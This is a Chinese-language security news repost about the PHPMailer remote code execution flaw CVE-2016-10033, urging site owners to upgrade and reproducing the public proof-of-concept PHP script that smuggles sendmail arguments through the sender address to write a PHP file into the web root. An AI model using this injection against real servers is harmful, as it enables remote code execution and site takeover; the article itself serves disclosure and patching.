PHPMailer远程任意代码执行漏洞CVE-2016-10033 900万用户受影响 站长们要小心了

简介:

PHPMailer出现漏洞CVE-2016-10033,全球900万用户容易遭受远程攻击。官方目前已经发布新版本,请用户尽快升级。PHPMailer 5.2.18 之前所有版本都受到影响。CVE官方对于该漏洞的描述还处于 保留状态 

PHP Mailer是什么

PHPMailer,用于发送电子邮件的最受欢迎的开源 PHP 库之一,也是PHPMailer是一个用于发送电子邮件的PHP函数包。据估计,世界各地的超过 900 万用户利用此库。数以百万计的使用 PHP 和流行的 CMS,目前包括 WordPress,rupal 和 Joomla 网站使用库发送电子邮件。

PHPMailer远程任意代码执行漏洞CVE-2016-10033

该漏洞由安全专家 Dawid Golunski 从Legal Hacker网站上发布,远程未经身份验证的攻击者可以利用该漏洞,在 web 服务器的上下文中执行任意代码,攻击目标 web 应用程序。

"独立的研究发现了 PHPMailer,可以潜在地用于 (未经身份验证) 的远程攻击者,实现远程执行任意代码的上下文中的 web 服务器用户和远程破坏目标 web 应用程序中一个严重的漏洞"。Golunski 解释说。

"利用此漏洞的攻击者,可以攻击共用的网站组件,包括联系/反馈表单、 注册表单、 电子邮件的密码重置等,并利用 有漏洞版本的PHPMailer 类发送电子邮件"。

PoC (PHPMailer远程任意代码执行漏洞CVE-2016-10033)

这个漏洞的PoC代码已经公开。

<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg:
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 
09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc. 
// For example from a Contact form
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "customer_feedback@company-X.com"; 
$mail->AddAddress($address, "Some User");
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body);
if(!$mail->Send()) { 
echo "Mailer Error: " . $mail->ErrorInfo; 
} else { 
echo "Message sent!\n"; 
}

据研究人员称,还开发了无身份验证 RCE 开发为一种流行开源代码部署的应用程序 (在互联网上超过 100 万的服务器上) 作为 PoC 真实开发。这个应该会在厂商修复漏洞之后公布。

PHPMailer%20CVE-2016-10033.png



原文发布时间: 2017年3月24日  
本文由:securityaffairs发布,版权归属于原作者
原文链接:http://toutiao.secjia.com/phpmailer-vulnerability-cve-2016-10033
本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站
相关文章
|
4月前
|
云安全 安全 中间件
如何确认网站是否有漏洞,如何找出网站存在的漏洞,找到漏洞该如何处理
如何确认网站是否有漏洞,如何找出网站存在的漏洞,找到漏洞该如何处理
如何确认网站是否有漏洞,如何找出网站存在的漏洞,找到漏洞该如何处理
|
6月前
|
安全 Shell PHP
渗透攻击实例-文件上传导致任意代码执行
渗透攻击实例-文件上传导致任意代码执行
|
7月前
|
Web App开发 JSON 安全
【漏洞复现】Yapi接口管理平台远程代码执行漏洞
Yapi接口管理平台远程代码执行漏洞,攻击者可通过特定Payload对目标实施恶意攻击,获取敏感信息,操控服务器指令。
121 1
|
7月前
|
SQL Web App开发 安全
Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取
Smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
169 0
|
11月前
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
|
供应链 安全 IDE
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190)
|
移动开发 安全 Oracle
Log4j2远程执行代码漏洞如何攻击? 又如何修复
Log4j2远程执行代码漏洞如何攻击? 又如何修复
701 0
Log4j2远程执行代码漏洞如何攻击? 又如何修复
|
XML Web App开发 安全
我如何发现Facebook服务器中的远程代码执行漏洞
大家好!首先我做一下自我介绍。我叫Reginaldo Silva,是一名巴西籍的计算机工程师。最近我的工作与信息安全有关,尤其是在Web应用程序安全性的方面。如果可以的话,我很乐意给大家演示如何入侵网站和应用程序。我的主页上有一些相关信息,欢迎大家浏览。
183 0
|
新零售 Web App开发 安全
网站程序有漏洞怎么修复和查找漏洞
ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站的漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对网站数据库进行攻击。
2290 0